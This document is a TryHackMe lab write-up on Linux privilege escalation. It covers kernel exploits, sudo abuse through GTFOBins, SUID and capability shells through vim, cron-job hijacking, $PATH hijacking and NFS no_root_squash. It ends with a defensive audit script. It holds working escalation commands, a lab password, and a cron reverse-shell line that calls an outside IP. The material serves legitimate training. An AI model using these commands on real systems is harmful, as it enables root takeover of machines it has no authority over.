# Linux privilege
###### tags: `tryhackme` `privilege`

[TOC]

# Kernel Privilege

Target system information:

![](https://i.imgur.com/VWc2aQo.png)

---

![](https://i.imgur.com/IYqaMYR.png)

Our machine:

```
# serve ovf.c to the client that connects on port 443
nc -lvnp 443 -k < ovf.c
```

Victim:

```
cd /var/tmp
nc 10.17.11.72 443 > ovf.c
gcc ovf.c -o ovf
./ovf
whoami
find / -name flag.txt
cat flag.txt
```

# Sudo

Leverage applications that the user is allowed to run through sudo. Reference: https://gtfobins.github.io/

![](https://i.imgur.com/jI0uazy.png)

---

It can be used to break out from restricted environments by spawning an interactive system shell.

![](https://i.imgur.com/O3xozrS.png)

---

![](https://i.imgur.com/IasVMzm.png)

# SUID Problem

![](https://i.imgur.com/fwtFhUn.png)

## Permission Bypass

![](https://i.imgur.com/ZtnXJUd.png)

![](https://i.imgur.com/jHqju4b.png)

Find files that have the special SUID permission set (the `s` bit):

```
find / -type f -perm -04000 -ls 2>/dev/null
```

![](https://i.imgur.com/y0yjQVZ.png)

![](https://i.imgur.com/yCFcl6o.png)

![](https://i.imgur.com/PUxY6qE.png)

![](https://i.imgur.com/5luF28i.png)

![](https://i.imgur.com/NjAZjz7.png)

---

![](https://i.imgur.com/FYz5Bgm.png)

![](https://i.imgur.com/28raCSr.png)

## Capability

![](https://i.imgur.com/e0vJFte.png)

### find

```
getcap -r / 2>/dev/null
```

![](https://i.imgur.com/3Y3CJ4C.png)

```
:py3
import os
os.setuid(0)
os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
# Execute the program "/bin/sh", passing "sh" and "-c" as arguments along with the string "reset; exec sh".
```

- uid 0 -> root
- execute `/bin/sh`
- command:
  - `sh -c reset`: reset the terminal
  - `sh -c exec sh`: open a new shell

![](https://i.imgur.com/W4IUyXL.png)

---

```
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
```

![](https://i.imgur.com/2ovKYt8.png)

---

## Cron

```
cat /etc/crontab
```

![](https://i.imgur.com/Ha8jdYS.png)

![](https://i.imgur.com/0EUgEP6.png)

```
vim backup.sh
chmod +x backup.sh
```

bash shell:

```
bash -l >& /dev/tcp/10.10.10.10/6666 0>&1
```

![](https://i.imgur.com/Lhp1bag.png)

![](https://i.imgur.com/oJI6Wip.png)

---
![](https://i.imgur.com/acT5aPI.png)

---

![](https://i.imgur.com/CaN0zps.png)

![](https://i.imgur.com/aNdYPb6.png)

![](https://i.imgur.com/oTVGOyO.png)

## $PATH

### $PATH writable

![](https://i.imgur.com/cI4I7tg.png)

root file:

```
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main(void) {
    setuid(0);
    setgid(0);
    /* "thm" has no path, so it is resolved through $PATH */
    system("thm");
    return 0;
}
```

```
cd /tmp
echo "/bin/bash" > thm
./rootfile
```

![](https://i.imgur.com/lj9aW3T.png)

## NFS (Network File Share)

Vulnerable option -> `no_root_squash`

Display the target's shared file paths:

```
showmount --exports 10.0.0.12
```

This shows the NFS server's export list.

Mount the shared directory:

```
mount -o rw 10.0.0.12:/tmp /ourmachine/directory
```

`-o`: options list

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");   /* absolute path to the shell */
    return 0;
}
```

```
gcc code.c -o code -w
chmod +s code   # set SUID
```

---

## Challenge

```
[leonard@ip-10-10-42-180 ~]$ uname -a
Linux ip-10-10-42-180 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```

Kernel version: `3.10.0-1160.el7.x86_64`

### Gathering system information

![](https://i.imgur.com/b0Y6G9R.png)

Testing the kernel:

![](https://i.imgur.com/Yp9iCPV.png)

No vulnerability.

---

![](https://i.imgur.com/5j2pbe8.png)

### Sudo

![](https://i.imgur.com/RPSB7IU.png)

No sudo privilege.

### SUID

![](https://i.imgur.com/pJ18Rhr.png)

![](https://i.imgur.com/zfD4rrv.png)

Using john to crack the root password:

![](https://i.imgur.com/HCKEWO3.png)

![](https://i.imgur.com/f3bEqFR.png)

Brute-forcing the password failed.

### Crontab

![](https://i.imgur.com/tDV8tQy.png)

### Target

![](https://i.imgur.com/NjLNkjG.png)

We could try to find user Missy and Rootflag.

![](https://i.imgur.com/W2SD8IF.png)

Not Missy and Rootflag users

![](https://i.imgur.com/ttvyCV5.png)

Missy password -> Password1

## Sudo -l (missy)

![](https://i.imgur.com/dQT66N6.png)

We can use the `find` command for privilege escalation:

```
sudo find . -exec /bin/sh \; -quit
```

![](https://i.imgur.com/BEhVfGM.png)

flag 1

![](https://i.imgur.com/WdIhxEe.png)

flag 2

![](https://i.imgur.com/LjdWUhv.png)
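
As a defensive counterpart to the Capability, Cron and NFS sections above, this added script (not part of the original notes) flags `no_root_squash` exports, binaries holding `cap_setuid`, and root cron jobs whose script is missing or writable by group/other. The function names, sample paths and sample input are assumptions constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes). Each helper reads text on stdin,
# so it works on live command output or on saved samples.

# /etc/exports content -> exports that disable root squashing
audit_exports() {
  awk '!/^[ \t]*#/ && /no_root_squash/ { print "NFS no_root_squash: " $1 }'
}

# `getcap -r / 2>/dev/null` output -> binaries allowed to change their UID
audit_caps() {
  awk '/cap_setuid/ { print "cap_setuid: " $1 }'
}

# /etc/crontab content -> root jobs whose script is missing or is
# writable by group/other (fields: m h dom mon dow user command)
audit_cron() {
  awk '!/^[ \t]*#/ && NF >= 7 && $1 ~ /^[0-9*]/ { print $6, $7 }' |
  while read -r user cmd; do
    [ "$user" = "root" ] || continue
    case "$cmd" in /*) ;; *) continue ;; esac   # only absolute script paths
    if [ ! -e "$cmd" ]; then
      echo "cron target missing: $cmd"
    elif [ -n "$(find -L "$cmd" -maxdepth 0 \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]; then
      echo "cron target writable by group/other: $cmd"
    fi
  done
}

# Constructed sample input (not taken from the target in these notes)
audit_exports <<'EOF'
/srv/share  *(ro,root_squash)
/tmp        *(rw,sync,insecure,no_root_squash,no_subtree_check)
EOF
audit_caps <<'EOF'
/usr/bin/ping = cap_net_raw+ep
/opt/demo/vim = cap_setuid+ep
EOF

# On a live host (as root):
#   audit_exports < /etc/exports
#   getcap -r / 2>/dev/null | audit_caps
#   audit_cron < /etc/crontab
```

Every line it prints is a finding to review: remove `no_root_squash` from the export, drop the capability with `setcap -r <file>`, or fix the ownership and mode of the cron script and its directory.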